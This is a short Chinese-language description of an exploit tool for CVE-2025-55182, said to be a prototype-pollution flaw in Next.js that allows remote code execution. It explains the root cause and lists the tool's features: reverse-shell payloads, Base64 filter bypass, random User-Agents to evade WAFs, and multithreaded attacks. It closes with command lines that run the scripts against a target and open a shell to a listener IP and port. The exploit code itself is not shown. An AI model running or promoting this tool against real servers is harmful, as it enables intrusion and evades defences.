CVE-2025-55182 是 nextjs 中一个严重的原型污染漏洞,由于框架的请求处理机制对输入净化不当,可实现远程代码执行(RCE)。整件事的根源在于 nextjs 居然像毫无经验的新手一样信任 JSON 对象。
1)请求解析中的原型污染:nextjs 未能正确净化可污染原型链的对象。
2)不安全的反序列化:该框架允许 JSON 对象修改基类对象原型。
3)通过 child_process 实现 RCE:污染原型链后,我们可以劫持逻辑,让服务器执行任意命令。
npm create [email protected] vuln
1)反弹 Shell Payload:Linux/Windows 反弹 Shell
2)Base64 编码绕过过滤器
3)自动操作系统探测
4)随机 User-Agent 规避 WAF
5)失败重试循环:带指数退避的重试机制
6)多线程并发利用,提高可靠性
python exp_v2.py target 192.168.1.69 9001 --base64
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3
python exploit.py target.com 192.168.1.69 9001 --no-spoof